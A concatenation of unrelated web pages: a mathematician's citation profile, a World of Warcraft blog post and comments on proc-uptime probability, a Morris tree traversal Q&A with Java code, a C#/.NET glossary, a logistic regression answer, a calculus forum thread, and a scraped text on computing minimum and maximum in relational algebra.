Asymptotics of eigenvalues of large symmetric Toeplitz matrices with smooth simple-loop symbols. Zbl 1420.15019
Batalshchikov, A. A.; Grudsky, S. M.; Malisheva, I. S.; Mihalkovich, S. S.; Ramírez de Arellano, E.; Stukopin, V. A.
2019
On a universal algebra of singular operators on a closed interval. Zbl 0666.47022
Stukopin, V. A.; Simonenko, I. B.
1987
### Cited by 52 Authors
11 Stukopin, Vladimir Alekseevich 7 Razumov, Alexander V. 4 Grudsky, Sergei Mikhailovich 4 Zhang, Honglian 3 Beck, Jonathan 3 Böttcher, Albrecht 3 Göhmann, Frank 3 Hu, Naihong 3 Klümper, Andreas 3 Nirov, Khazret S. 2 Batalshchikov, A. A. 2 Bogoya, Johan M. 2 Frenkel, Edward V. 2 Jing, Naihuan 2 Maksimenko, Egor A. 2 Ramírez de Arellano, Enrique 2 Torrielli, Alessandro 2 Tsymbaliuk, Oleksandr 2 Zolotykh, Svetlana Andreevna 1 Boos, Herman E. 1 Boos, Hermann 1 Chen, Hongjia 1 Damiani, Ilaria 1 Deundyak, Vladimir Mikhaĭlovich 1 Ekstrom, Sven-Erik 1 Elouafi, Mohamed 1 Feng, Ge 1 Gow, Lucy 1 Gromov, Nikolay A. 1 Guay, Nicolas 1 Hakobyan, Tigran Stepanovich 1 Hayaishi, Norifumi 1 Jia, Xiaoyu 1 Kac, Victor G. 1 Kaplitskiĭ, Vitaliĭ Markovich 1 Levkovich-Maslyuk, Fedor 1 Luo, Cuiling 1 Malisheva, I. S. 1 Mihalkovich, S. S. 1 Miki, Kei 1 Molev, Alexander I. 1 Mukhin, Evgeny 1 Negut, Andrei 1 Peng, Yung-Ning 1 Reshetikhin, Nikolai Yu. 1 Rosso, Marc 1 Sedrakyan, Ara 1 Simonenko, Igor’ Borisovich 1 Spill, Fabian 1 Vassalos, Paris 1 Yao, Shao-Kui 1 Zhuang, Rushu
### Cited in 30 Serials
6 Communications in Mathematical Physics 6 Theoretical and Mathematical Physics 4 Letters in Mathematical Physics 3 Journal of Geometry and Physics 3 Advances in Mathematics 2 Journal of Mathematical Physics 2 Linear Algebra and its Applications 2 Journal of Mathematical Sciences (New York) 2 Vladikavkazskiĭ Matematicheskiĭ Zhurnal 1 Communications in Algebra 1 Mathematical Notes 1 Nuclear Physics. B 1 Reviews in Mathematical Physics 1 Annales Scientifiques de l’École Normale Supérieure. Quatrième Série 1 Integral Equations and Operator Theory 1 Journal of Algebra 1 Journal of Computational and Applied Mathematics 1 Mathematische Zeitschrift 1 Journal of the American Mathematical Society 1 Numerical Algorithms 1 Advances in Applied Clifford Algebras 1 Selecta Mathematica. New Series 1 Boletín de la Sociedad Matemática Mexicana. Third Series 1 Sbornik: Mathematics 1 Izvestiya: Mathematics 1 Acta Mathematica Sinica. English Series 1 Journal of High Energy Physics 1 Lobachevskii Journal of Mathematics 1 SIGMA. Symmetry, Integrability and Geometry: Methods and Applications 1 Advances in Mathematical Physics
### Cited in 16 Fields
36 Nonassociative rings and algebras (17-XX) 17 Quantum theory (81-XX) 15 Associative rings and algebras (16-XX) 10 Linear and multilinear algebra; matrix theory (15-XX) 6 Numerical analysis (65-XX) 5 Operator theory (47-XX) 4 Statistical mechanics, structure of matter (82-XX) 3 Group theory and generalizations (20-XX) 2 Approximations and expansions (41-XX) 2 Relativity and gravitational theory (83-XX) 1 History and biography (01-XX) 1 Algebraic geometry (14-XX) 1 Topological groups, Lie groups (22-XX) 1 Several complex variables and analytic spaces (32-XX) 1 Special functions (33-XX) 1 Algebraic topology (55-XX) |
# 6.2 Tiger Strikes uptime
Update: Geodew has correctly pointed out that because of the low amount of proc events within the duration of the buff, and because you can’t have partial attacks, the Poisson process is not valid. Check back for a corrected post later today. (view the bottom of this post, and the comments, for the conclusion I came to with Hamlet)
As we covered earlier in the 6.2 first look, the structure of Tiger Strikes is changing. It’s losing the ability to proc from multistrikes, but increasing the amount of multistrike it gives when it does proc. So currently, you have a 10% proc chance on all melee attacks and melee multistrikes, and after the patch, it’s merely a 10% proc chance on all melee attacks, but not their multistrikes.
The primary difficulties in theorycrafting the uptime for Tiger Strikes are the fact that it can overlap itself, refreshing the buff instead of stacking or adding time, and the fact that when Tiger Strikes is up, you have a higher chance of further Tiger Strikes chances because of the higher multistrike chance it gives. The 6.2 change removes this second aspect, so all you have to worry about is the overlapping procs.
I was first looking at the effects of weapon speed, haste, and multistrike on Tiger Strikes about two months ago, and ran into all of these same issues. I asked noted WoW theorycrafter Hamlet if he had any tips and he pointed me in the direction of this post, which didn’t quite work out for me because it had the same issues with the multistrike buff. I kept it in the back of my mind, though, and in 6.2, it’ll be perfectly applicable.
If you scroll down to “More Elaborate PPM: Overlaps and Poisson”, this is exactly what we need. Tiger Strikes has a proc chance rather than being PPM, but the PPM isn’t the essential part of the formula anyway. The uptime formula is $1 - e^{-\lambda}$, where $\lambda$ is the average procs in the duration of the buff. Then we just have to figure out how many times we attack every 8 seconds (the duration of Tiger Strikes), multiply by .1, and there you have it. The result for $\lambda$ is .1*(8/(Base Weapon Speed/(1+raid buffed haste))), with (1+ raid buffed haste) multiplied by 1.55 if you have a two-hander to account for Way of the Monk. The final formula you have for Tiger Strikes is then
$1-e^{-{.1*(8/(BAT/(1+RBH)))}}$
We’ll then check this against our sim , which gave us an estimated 46.08% uptime with base attack speed of 1.6 and 1007 haste. That turns into 19.08% raid buffed haste with haste food. Plugging these values in gives us a result of 44.86%, which is close enough for me to breathe a sigh of relief over my sim being mostly accurate.
The section I chose from that post was wrong for these purposes. I missed the most important part: “This is a good model for WoW procs as long as the attack rate is very high compared to the time intervals being examined.” With 3-6 attacks in that 8 second period, that requirement is not met. Instead, we can use the first formula from the appendix, as follows.
${1-(1-P)^N}$
In our case, P is the proc chance, 0.1, and N is the number of attacks in the buff period, i.e. how many attacks you can fit into 8 seconds. This is simply 8/(BAT/(1+RBH%/100)). Geodew points out that since attacks are discrete events, you should round down. In our case, with 1007 haste and 250 haste from food, raid buffed haste is 19.665%, and base attack speed is 1.6. 8/(1.6/(1+19.665/100)) = 5.98325, which we truncate to 5. Then you do 1-(1-.1)^5 = .4095, or 40.95%. This is a fair amount lower than the other approximation, which invites further investigation.
If we treat partial attacks as valid, we don’t truncate at all. 1-(1-.1)^5.98325 = .467620, which is 46.76%. This is strikingly close to the simulated result of 46.08%. I’m not saying the sim is perfect, but it does seem curious that the result is so much closer to the non-truncated result. Perhaps treating attacks as discrete is the wrong way to approach it, over long periods of time? Perhaps the sim is way off? I’ll run it again in a few hours when I get home to check the numbers.
Final edit: I got home and ran a longer sim, covering 999,999,999 milliseconds, the equivalent of 277.78 hours. I also made sure to use 250 haste food rather than 200 multistrike food, which I had in an earlier version of the sim. The estimated uptime was 46.76%. I now feel fairly confident in saying treating attacks as discrete events is an incorrect approach.
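For reference, the three approximations can be put side by side in a few lines (a sketch using the 1.6 base speed and 19.665% raid buffed haste figures from above):

```python
import math

P = 0.1                        # proc chance per autoattack
DURATION = 8.0                 # Tiger Strikes buff duration in seconds
T = 1.6 / (1 + 19.665 / 100)   # hasted swing time
attacks = DURATION / T         # ~5.98325 attacks per buff window

poisson    = 1 - math.exp(-P * attacks)          # continuous Poisson model
truncated  = 1 - (1 - P) ** math.floor(attacks)  # discrete, whole attacks only
fractional = 1 - (1 - P) ** attacks              # discrete, partial attacks allowed

print(f"{poisson:.4f} {truncated:.4f} {fractional:.4f}")
# fractional (~0.4676) lands closest to the simulated 46.76% uptime
```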
## 21 thoughts on “6.2 Tiger Strikes uptime”
1. arawethion says:
That’s a very odd result. There’s no reason you wouldn’t expect an integer number of attacks, so it’s worth poking at this more.
One thing that might be confounding it is that you picked a setup where the # of attacks is just under an integer (5.98). In theory that shouldn't matter, because it's 5 attacks and not 6, and should be the same TS uptime as with 5.01 attacks in the window, but maybe the fact that it's so close to 6 affects the simulation.
Does the simulation include any temporary haste effects of any kind?
Is there any way to check the sim output it detail to see whether, whenever you get a single TS proc, it in fact buffs only 5 swings?
Basically, now that the MS complication is removed, the discrete model should be a very good one. And while something unexpected can always come up in the real world that makes a model incorrect, it’s different for something unexpected to come up in the simulation (since the simulation only reflects our knowledge, not any unexpected/unknown behaviors). The simulation must be making some assumption that causes the calculation to not be right. It’s worth figuring out what that is so they can be reconciled.
2. arawethion says:
Also, is the sim measuring “uptime” of the buff, or % of attacks affected? The latter is what matters and what my formula computes.
1. I suspect this may be the key here. The sim measures the uptime of the buff. Although Tiger Strikes only procs off of autoattacks, the increase in multistrike% affects all damage events, no matter their source. Because we want to look at the % of all attacks affected, not the % of autoattacks affected, I believe we should use the continuous formula rather than the discrete one.
1. Actually now that I think about it further, to account for DPS gain from added Tiger Strikes, perhaps I should use a weighted average of the discrete formula and the continuous formula, based on how many attacks in each 8 second period are autoattacks and how many are otherwise.
2. arawethion says:
Yeah, it seems that in a full DPS model, you should use the un-truncated one for the TS uptime (i.e. % of attacks affected) for special attacks, and the truncated one for white attacks. I hadn’t thought about that before–it should be a very accurate model.
Getting such a good confirmation of the basic formula in a simulation (once we sorted out the tricky part) is really neat too.
3. My method on MMOC with n=6 (since I use a different definition of n) and swing speed of (1.6/1.19665) yields 47.4021%.
1 – (0.9)^6 = 46.856% (but this may be a coincidence since 5.98325 is so close to 6. Maybe choose a different swing speed for testing?)
I’ll try to figure out the discrepancies tomorrow.
1. Uh, I typed up an entire reply, but I’m not sure it went through… Fucking a… I’ll have to type it up again tomorrow unless it’s just pending and I can’t see it or something, as I’ve got to go. In short, my formula is correct, but I must have punched it in the calculator wrong. The answer is 0.46756992925.
1. (as you can see, the fractional exponent thing you did is close, but not correct, and would become more incorrect the farther you go from an integer)
2. Did you see the conclusion Hamlet and I came to above regarding discrete vs continuous and white hits vs special attacks?
Also, I don’t see any pending posts, so I think it went into the void.
3. I think I see the problem because it just happened again. The comment is too long to be accepted, and it just deletes it instead of doing anything intelligent. Sorry, but I’ll have to post it in chunks. Wisely, I saved it in a document before trying to post again.
——————————————————————————————————–
Yes, I did see what you guys said, and I was trying to reply :P. It seemed like Hamlet was not sure whether or not the expression
1-(1-p)^(8/(swing speed)) = 1-(1-.1)^5.98325
was correctly giving the %time uptime, though. I’m claiming that it is not correct, nor is 1-(1-.1)^5, nor is the continuous-time poisson process model you did.
Hamlet was correct in realizing that 1-(1-p)^n gives uptime only in the sense of “percentage of autoattacks for which Tiger Strikes is up.” That’s not the formula we want, though, as you two realized; we want “percentage of time for which Tiger Strikes is up.” To help you understand, let me re-derive the formula for the former:
Tiger Strikes average “uptime,” for autoattacks ONLY
= P[Tiger Strikes is up at the time of any given autoattack]
= P[Tiger Strikes has procced in the last 8 seconds, given the current time is that of an autoattack]
= P[Tiger Strikes has procced in the last n autoattack swings]
>> where n = floor(8 / T), i.e. Hamlet’s definition; T = time between autoattack swings, including haste effects
= 1 – P[Tiger Strikes has NOT procced in the last n autoattack swings]
>> Assume 6.2 proc behavior for now
= 1 – (1-p)^n
Q.E.D.
Tiger Strikes average uptime for all steady-state time
= P[Tiger Strikes is up at time t]
>> where t is a uniformly random variable in [8.0, infinity] (8.0 to allow steady-state)
= SUM(P[i autoattacks occurred in the last 8 seconds, given the current time is t] * P[Tiger Strikes would proc after i subsequent attacks]) for i = 0 to +infinity
= P[n autoattacks occurred in the last 8 seconds, given the current time is t] * P[Tiger Strikes would proc after n subsequent attacks] + P[n+1 autoattacks occurred in the last 8 seconds, given the current time is t] * P[Tiger Strikes would proc after n+1 subsequent attacks]
>> See http://imgur.com/OCJYrvM to convince yourself of the above step and the next step
>> Still assuming 6.2 proc behavior
= (((n+1)*T – 8.0) / T) * (1 – (1-p)^n) + (((8.0+T) – (n+1)*T) / T) * (1 – (1-p)^(n+1))
>> for n=5, T=1.6/1.19665, and p=0.1, yields 0.46756992925, which is more than reasonably close to the simulation to give credibility
Q.E.D.
However, this makes assumptions about the proc behavior. The reason I derived the formula the way I did on MMOC is because the MMOC formula is easily extensible to the 6.1 case.
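Geodew's closed form above can be checked numerically (a sketch with the same inputs he used: n = 5 whole swings fit in the 8-second window, T is the hasted swing time):

```python
p = 0.1              # proc chance per autoattack
T = 1.6 / 1.19665    # hasted swing time
n = 5                # floor(8 / T): whole swings that fit in 8 seconds

# weighted mix of the "n swings in window" and "n+1 swings in window" cases
uptime = (((n + 1) * T - 8.0) / T) * (1 - (1 - p) ** n) \
       + (((8.0 + T) - (n + 1) * T) / T) * (1 - (1 - p) ** (n + 1))
print(uptime)  # ~0.4675699, matching the 0.46756992925 quoted above
```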
5. In fact, we can prove the equivalence of the two expressions (i.e. the one above and the first one I derived on MMOC) with some mathemagical algebra.
Tiger Strikes average uptime for all steady-state time
= (((n+1)*T – 8.0) / T) * (1 – (1-p)^n) + (((8.0+T) – (n+1)*T) / T) * (1 – (1-p)^(n+1))
= (1-(1-p)^n) * ((n+1)*T – 8.0) / T + (1-(1-p)^(n+1)) * ((8.0+T) – (n+1)*T) / T
= (1-(1-p)^n) * ((n+1)*T – 8.0) / T + (1-(1-p)^(n+1)) * (8.0 – n*T) / T
= (1-(1-p)^n) * ((n+1)*T – 8.0) / T + (1-(1-p)*(1-p)^n) * (8.0 – n*T) / T
= (1-(1-p)^n) * ((n+1)*T – 8.0) / T + (1-(1-p)^n + p*(1-p)^n) * (8.0 – n*T) / T
= (1-(1-p)^n) * ((n+1)*T – 8.0) / T + (1-(1-p)^n) * (8.0 – n*T) / T + (p*(1-p)^n) * (8.0 – n*T) / T
6. = (1-(1-p)^n) * (((n+1)*T – 8.0) + (8.0 – n*T)) / T + (p*(1-p)^n) * (8.0 – n*T) / T
= (1-(1-p)^n) + (p*(1-p)^n) * (8.0 – n*T) / T
= 1 – (1-p)^n + (p*(1-p)^n) * (8.0/T) – n*p*(1-p)^n
= 1 – (1-p)^n * (1+n*p) + (p*(1-p)^n)*(8.0/T)
>> Let N = n + 1 = my MMOC definition of n; => n = N-1
= 1 – (1-p)^(N-1) * (1+(N-1)*p) + (p*(1-p)^(N-1))*(8.0/T)
7. (wtf? my character limit is going down with each post)
>> Now begins a pattern
= 1 – (1-p)*(1-p)^(N-2) * (1+(N-1)*p) + (p*(1-p)^(N-1))*(8.0/T)
= 1 – (1-p)^(N-2) * (1+(N-1)*p) + p*(1-p)^(N-2) * (1+(N-1)*p) + (p*(1-p)^(N-1))*(8.0/T)
= 1 – (1-p)^(N-2) * (1+(N-1)*p) + p*(1-p)^(N-2) + p*(1-p)^(N-2) * ((N-1)*p) + (p*(1-p)^(N-1))*(8.0/T)
8. = 1 – (1-p)^(N-2) * (1+(N-1)*p-p) + (N-1)*p*p*(1-p)^(N-2) + (p*(1-p)^(N-1))*(8.0/T)
= 1 – (1-p)^(N-2) * (1+(N-2)*p) + (N-1)*p*p*(1-p)^(N-2) + (p*(1-p)^(N-1))*(8.0/T)
9. >> Now begins 2nd iteration of pattern
= 1 – (1-p)*(1-p)^(N-3) * (1+(N-2)*p) + (N-1)*p*p*(1-p)^(N-2) + (p*(1-p)^(N-1))*(8.0/T)
= 1 – (1-p)^(N-3) * (1+(N-2)*p) + p*(1-p)^(N-3) * (1+(N-2)*p) + (N-1)*p*p*(1-p)^(N-2) + (p*(1-p)^(N-1))*(8.0/T)
10. = 1 – (1-p)^(N-3) * (1+(N-2)*p) + p*(1-p)^(N-3) + p*(1-p)^(N-3) * ((N-2)*p) + (N-1)*p*p*(1-p)^(N-2) + (p*(1-p)^(N-1))*(8.0/T)
11. = 1 – (1-p)^(N-3) * (1+(N-2)*p-p) + (N-2)*p*p*(1-p)^(N-3) + (N-1)*p*p*(1-p)^(N-2) + (p*(1-p)^(N-1))*(8.0/T)
12. Posting one line at a time is dumb. Fuck this, posting on MMOC. Stupid automated anti-spam thing
4. I tried looking for something to extend the comment length but no dice 😦
# What is Morris Traversal for a Tree and how to implement one?
Technology CommunityCategory: Binary TreeWhat is Morris Traversal for a Tree and how to implement one?
VietMX Staff asked 5 months ago
Morris (in-order) traversal is a tree traversal algorithm that does not use recursion or a stack. In this traversal, links are created as successors and nodes are printed using these links. Finally, the changes are reverted to restore the original tree.
Basically a tree is threaded by making all right child pointers that would normally be null point to the inorder successor of the node (if it exists), and all left child pointers that would normally be null point to the inorder predecessor of the node. Consider:
Algorithm:
• Initialize the current node curr as the root.
• While curr is not NULL, check if curr has a left child.
• If curr does not have a left child, print curr and update it to point to curr's right child.
• Else, find the rightmost node in curr's left subtree (curr's inorder predecessor). If that node's right pointer is NULL, make curr its right child (this creates the temporary thread) and update curr to its left child.
• If that node's right pointer already points to curr, the left subtree has been fully visited: remove the thread, print curr, and update curr to its right child.
Complexity Analysis
One way of looking at the time complexity is to count how many times each tree node is traversed. As this is constant (at most 3 times per node), the total time is O(n). The space complexity is O(1), since no stack or recursion is used.
Implementation (note that this is the preorder variant: it prints a node when the thread is created, rather than when the thread is removed as in the in-order version):
```java
public class MorrisPreorderTraversal {
    static class Node {       // static class to represent node structure
        int data;             // to store data of each node
        Node left, right;     // to point to left and right child of the node respectively

        Node(int d) {         // constructor for initialisation of each value
            this.data = d;
            this.left = null;
            this.right = null;
        }
    }

    public static void printPreorder(Node root) {
        if (root == null) {   // if tree is empty
            return;
        }
        while (root != null) {
            if (root.left == null) {                // if left child is empty
                System.out.print(root.data + " ");  // traverse current node and
                root = root.right;                  // move to its right
            } else {
                Node curr = root.left;              // to store inorder predecessor
                while (curr.right != null && curr.right != root) {
                    curr = curr.right;
                }
                if (curr.right == root) {  // if right child of inorder predecessor points to root node itself
                    curr.right = null;
                    root = root.right;
                } else {                                // otherwise
                    System.out.print(root.data + " ");  // traverse current node
                    curr.right = root;  // make right child of inorder predecessor point to this node
                    root = root.left;
                }
            }
        }
    }

    public static void main(String args[]) {
        Node root = new Node(1);
        root.left = new Node(2);
        root.right = new Node(3);
        root.left.left = new Node(4);
        root.left.right = new Node(5);
        root.right.left = new Node(6);
        root.right.right = new Node(7);
        printPreorder(root);
    }
}
/*
Sample Input Tree:
        1
       / \
      2   3
     / \ / \
    4  5 6  7

Sample Output:
1 2 4 5 3 6 7

Time Complexity: O(n), where n is the number of nodes in the given tree
Space Complexity: O(1)
*/
```
## C# & .NET Terminology Demystified: A Glossary
After my last glossary post on LoRa, I thought I'd write another one on C♯ and .NET, as (in typical Microsoft fashion, it would seem) there seems to be a lot of jargon floating around whose meaning is not always obvious.
If you're new to C♯ and the .NET ecosystems, I wouldn't recommend tackling all of this at once - especially the bottom ~3 definitions - with those in particular there's a lot to get your head around.
### C♯
C♯ is an object-oriented programming language that was invented by Microsoft. It's cross-platform, and is usually written in an IDE (Integrated Development Environment), which has a deeper understanding of the code you write than a regular text editor. IDEs include Visual Studio (for Windows) and MonoDevelop (for everyone else).
### Solution
A Solution (sometimes referred to as a Visual Studio Solution) is the top-level definition of a project, contained in a file ending in .sln. Each solution may contain one or more Project Files (not to be confused with the project you're working on itself), each of which gets compiled into a single binary. Each project may have its own dependencies too: whether they be a core standard library, another project, or a NuGet package.
### Project
A project contains your code, and sits 1 level down from a solution file. Normally, a solution file will sit in the root directory of your repository, and the projects will each have their own sub-folders.
While each project has a single output file (be that a .dll class library or a standalone .exe executable), a project may have multiple dependencies - leading to many files in the build output folder.
The build process and dependency definitions for a project are defined in the .csproj file. This file is written in XML, and can be edited to perform advanced build steps, should you need to do something that the GUI of your IDE doesn't support. I've blogged about the structuring of this file before (see here, and also a bit more here), should you find yourself curious.
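For illustration, a minimal SDK-style .csproj might look something like this (a sketch only; the target framework and the package reference are placeholder assumptions, not from any real project):

```xml
<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <!-- Exe for a standalone executable; omit for a .dll class library -->
    <OutputType>Exe</OutputType>
    <TargetFramework>netcoreapp2.0</TargetFramework>
  </PropertyGroup>
  <ItemGroup>
    <!-- NuGet package dependencies are declared here -->
    <PackageReference Include="Newtonsoft.Json" Version="11.0.2" />
  </ItemGroup>
</Project>
```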
### CIL
Known as the Common Intermediate Language, CIL is the binary format that C♯ (and also Visual Basic and F♯) code gets compiled into. From here, the .NET runtime (on Windows) or Mono (on macOS, Linux, etc.) can execute it to run the compiled project.
### MSBuild
The build system for Solutions and Projects. It reads a .sln or .csproj (there are others for different languages, but I won't list them here) file and executes the defined build instructions.
### .NET Framework
The .NET Framework is the standard library of C♯; it provides practically everything you'll need to perform most common tasks. It does not, however, provide a framework for constructing GUIs (graphical user interfaces). You can browse the API reference over at the official .NET API Browser.
### WPF
The Windows Presentation Foundation is a Windows-only GUI framework. Powered by XAML (eXtensible Application Markup Language) definitions of what the GUI should look like, it provides everything you need to create a native-looking GUI on Windows.
It does not work on macOS and Linux. To create a cross-platform program that works on all 3 operating systems, you'll need to use an alternative GUI framework, such as XWT or Gtk# (also: Glade). A more complete list of cross-platform frameworks can be found here. It's worth noting that Windows Forms, although a tempting option, aren't as flexible as the other options listed here.
### C♯ 7
The 7th version of the C♯ language specification. This includes the syntax of the language, but not the .NET Framework itself.
### .NET Standard
A specification of the .NET Framework, but not the C♯ Language. As of the time of typing, the latest version is 2.0, although version 1.6 is commonly used too. The intention here is to improve cross-platform portability of .NET programs by defining a specification for a subset of the full .NET Framework standard library that all platforms will always be able to use. This includes Android and iOS through the use of Xamarin.
Note that all .NET Standard projects are class libraries. In order to create an executable, you'll have to add an additional Project to your Solution that references your .NET Standard class library.
### ASP.NET
A web framework for .NET-based programming languages (in our case C♯). It allows you to write C♯ code to handle HTTP (and now WebSocket) requests in a similar manner to PHP, but differs in that your code still needs compiling. Compiled code is then managed by a web server, such as the IIS web server on Windows.
With the release of .NET Core, ASP.NET is now obsolete.
### .NET Core
Coming in 2 versions so far (1.0 and 2.0), .NET Core is the replacement for ASP.NET (though this is not its exclusive purpose). As far as I understand it, .NET Core is a modular runtime that allows programs targeting it to run multiple platforms. Such programs can either be ASP.NET Core, or a Universal Windows Platform application for the Windows Store.
This question and answer appears to have the best explanation I've found so far; in particular, the diagram displayed there is very helpful. So is the pair of official "Introducing" blog posts that I've included in the Sources and Further Reading section below.
### Conclusion
We've looked at some of the confusing terminology in the .NET ecosystem, and examined each piece of it in turn. We started by defining and untangling the process by which your C♯ code is compiled and run, and then moved on to the different variants and specifications related to the .NET Framework and C♯.
As always, this is a starting point - not an ending point! I'd recommend doing some additional reading and experimentation to figure out all the details.
Found this helpful? Still confused? Spotted a mistake? Comment below!
# Logistic regression for classification?
I have a dataset with most columns having Boolean values and categorical values. A sample of it is:
Name Country approved political
bbc.com US true True
stackoverflow.com US true False
Number.com US False False
...
Based on the values above, I would like to determine whether other websites have been approved or not.
My questions are:
Does a heatmap / correlation matrix make sense with categorical variables?
Would it be possible to predict whether a website is approved or not (the target variable) using categorical values?
Is there any other model that should be preferable?
Thanks
Logistic regression is a standard method of performing binary classification, which matches your task here. Categorical variables can be dealt with, depending on the model you choose.
You can see from the Scikit-Learn documentation on logistic regression that your data only really needs to be of a certain shape: (num_samples, num_features). Non-numerical columns can't be used directly, though, so you should convert e.g. strings to class IDs (e.g. integers); see below.
Computing the correlation can make sense for categorical values, but to compute these, you need to provide numerical values; strings like "bbc.com" or "US" won't work.
You can map each of the values to a numerical value and make a new column with that data using pd.factorize like this:
df["Country_id"] = pd.factorize(df.Country)[0] # taking the first return element: the ID values
df["Name_id"] = pd.factorize(df.Name)[0]
You don't need to do it really for the approved and political columns, because they hold boolean values, which are seen by Python as 0 and 1 for False and True, respectively.
Now you can do something like this to see a correlation plot:
import matplotlib.pyplot as plt # plotting library: pip install matplotlib
# compute the correlation matrix
corr_mat = df[["Name_id", "Country_id", "approved", "political"]].corr()
# plot it
plt.matshow(corr_mat)
plt.show()
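Putting the pieces together, here is a minimal end-to-end sketch of encoding plus fitting, assuming scikit-learn is installed; the fourth row is invented so the toy example has some variety to fit:

```python
import pandas as pd
from sklearn.linear_model import LogisticRegression

# Toy frame mirroring the sample in the question (the fourth row is made up).
df = pd.DataFrame({
    "Name": ["bbc.com", "stackoverflow.com", "number.com", "example.org"],
    "Country": ["US", "US", "US", "UK"],
    "approved": [True, True, False, True],
    "political": [True, False, False, False],
})

# Encode the string columns as integer IDs, as above.
df["Name_id"] = pd.factorize(df.Name)[0]
df["Country_id"] = pd.factorize(df.Country)[0]

X = df[["Name_id", "Country_id", "political"]].astype(int)
y = df["approved"].astype(int)

clf = LogisticRegression().fit(X, y)
preds = clf.predict(X)  # one 0/1 prediction per row
```

Note that Name_id is essentially a row identifier, so it carries no signal for unseen websites; in practice you would drop it or replace it with features derived from the name itself.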
It looks like there are two parts to your question:
1. You want to explore the data before predicting values, to gain insights about it. This falls under visual analytics, where EDA (exploratory data analysis) helps. Regarding the question of choosing the right kind of plot to see the distribution of categorical data, the links below give a very basic understanding of choosing the right chart type. Later on you can move to reading papers on visualization.
https://en.wikipedia.org/wiki/Data_visualization is a good starting point. I also prefer reading articles on Medium, as papers are too heavy to start with.
For this specific data I would be much more interested in seeing a count plot of the target variable and scatter plots for correlation. Seaborn has a nice pair-plot feature, usable after converting these features to numeric types as suggested in the first answer.
2. On the availability of models for classification: since your data has labels, this is a supervised classification problem. There are choices such as probability-based models (Naive Bayes), neural networks, logistic regression, etc. In practice we try different models, tune the parameters, check the performance, and do model evaluation to see if the model works well on unseen data, which is called generalization performance. Feel free to try libraries like Scikit-Learn, which let you implement each of them and compare performance: https://scikit-learn.org/stable/auto_examples/index.html#classification Specifically for logistic regression, see https://web.stanford.edu/~jurafsky/slp3/5.pdf To understand classification in very simple words, see the Classification chapter of Introduction to Data Mining by Pang-Ning Tan, Michael Steinbach and Vipin Kumar, which is available for free.
# Average value quest.
If the average salary $$S$$ of an NBA player is increasing and can be modeled by: $$\frac{dS}{dt} = \frac{1137.7}{\sqrt{t}} + 521.3$$ and $$t = 5$$ is 1985.
a. Find the salary function in terms of the year, given that the average salary in 1985 was \$325,000.
b. If the average salary continues to increase at this rate, in which year will the salary be \$4,000,000?
Would I use the Mean Value Theorem?
Any help is appreciated
Thanks
Have you done any work on this problem yet? Do you know what the answer is supposed to be for part b?
Why would you use the Mean Value Theorem? You have an easily separable DEQ with the initial condition S(5) = 325000. Just solve it for S(t), and then find S⁻¹(4000000).
--J
Justin Lazear said:
Why would you use the Mean Value Theorem? You have an easily separable DEQ with the initial condition S(5) = 325000. Just solve it for S(t), and then find S⁻¹(4000000).
--J
Correct me if I'm missing something here, but the equation has dS/dt and t in it, making it simply a first derivative. All that's needed is integrating the expression, and then setting the expression equal to S(5) and finding the constant of integration.
I'm not seeing where you're getting a Diff Eq from, when the equation doesn't contain a variable and its derivative.
scholzie said:
Correct me if I'm missing something here, but the equation has dS/dt and t in it, making it simply a first derivative. All that's needed is integrating the expression, and then setting the expression equal to S(5) and finding the constant of integration.
I'm not seeing where you're getting a Diff Eq from, when the equation doesn't contain a variable and its derivative.
S'pose you're right. Either way, it doesn't really matter what you call it. The problem's trivial, whether or not you decide to bring the dt to the other side before you integrate.
--J
Justin Lazear said:
S'pose you're right. Either way, it doesn't really matter what you call it. The problem's trivial, whether or not you decide to bring the dt to the other side before you integrate.
--J
It's no big deal... different strokes for different folks. I was just scared I was missing something, but we're on the same page.
I really don't understand why we wouldn't call it a differential equation! It's got the derivative, which is enough for me! But the definition is what the definition is, so. ;)
--J
dextercioby
$$\int_{325000}^{S} dS' = \int_{5}^{t} f(t')\,dt', \qquad f(t) = \frac{1137.7}{\sqrt{t}} + 521.3$$
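The integrate-and-solve recipe above can be checked numerically. This is a sketch assuming S is measured in dollars as stated, and that t = 5 corresponding to 1985 means year = 1980 + t:

```python
import math

def S(t):
    # Antiderivative of dS/dt = 1137.7/sqrt(t) + 521.3 is
    # 2275.4*sqrt(t) + 521.3*t + C; fix C from S(5) = 325000.
    C = 325000 - (2275.4 * math.sqrt(5) + 521.3 * 5)
    return 2275.4 * math.sqrt(t) + 521.3 * t + C

# S is increasing, so bisect for the t at which S(t) reaches 4,000,000.
lo, hi = 5.0, 1e7
while hi - lo > 1e-6:
    mid = (lo + hi) / 2
    if S(mid) < 4_000_000:
        lo = mid
    else:
        hi = mid
year = 1980 + lo  # t = 5 corresponds to 1985
```

If the problem intends S to be measured in thousands of dollars instead, rescale accordingly; the mechanics are identical.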
# relational algebra minimum
Posted on January 24, 2013 by Rachel

Relational algebra is a procedural query language: its operations take one or more relations as input and yield a relation as output. The basic operators are selection (σ), projection (π), union (∪), set difference (−), cross product (×) and rename (ρ); join is a cross product followed by a select, and this small set is complete in the sense that the other common operations can be expressed as sequences of operators drawn from it. Relational algebra is simple partly because the relational model has only one construct: the relation. SQL, the most important query language for relational databases, is based on relational algebra, although SQL is actually a bag language: a bag (or multiset) is like a set, except that an element may appear more than once, e.g. {1, 2, 1, 3}. The RENAME operation is used to rename the output of a relation; sometimes it is simple and suitable to break a complicated sequence of operations into pieces and rename each intermediate result.

Classical relational algebra has no aggregate operations (Sum, Count, Average, Maximum, Minimum), but minimum and maximum can be expressed with the basic operators. The key observation: a number isn't the maximum if it is less than another number in the relation.

Say we have a simple relation of letters and numbers, and we want to identify the maximum value in the Number column. We can start by identifying what numbers aren't the maximum. Take the cross product of the relation with a renamed copy of itself, and keep only the rows where Number1 < Number2 (i.e., a theta-join). If Number takes the values 1 through 4, the Number1 values of the theta-join are 1, 2 and 3, but not 4: every value that is smaller than some other value appears, so none of them can be the maximum. So, to get the maximum, we just take a projection of Number1 from the theta-join relation and subtract it from the projection of Number from the original relation. The minimum is obtained symmetrically, by selecting Number1 > Number2 instead. The same trick answers questions like "who has the top grade": take the cross product (renaming the copies as R1 and R2), select R1.grade < R2.grade to find everyone who isn't at the top, and subtract that from the original relation.

A related exercise: given relations R1 and R2 with N1 and N2 tuples (N2 > N1 > 0), find the minimum and maximum possible sizes of the results of various relational algebra expressions. For division, for example, the minimum possible size is 0, much as integer division 3 / 7 gives 0.
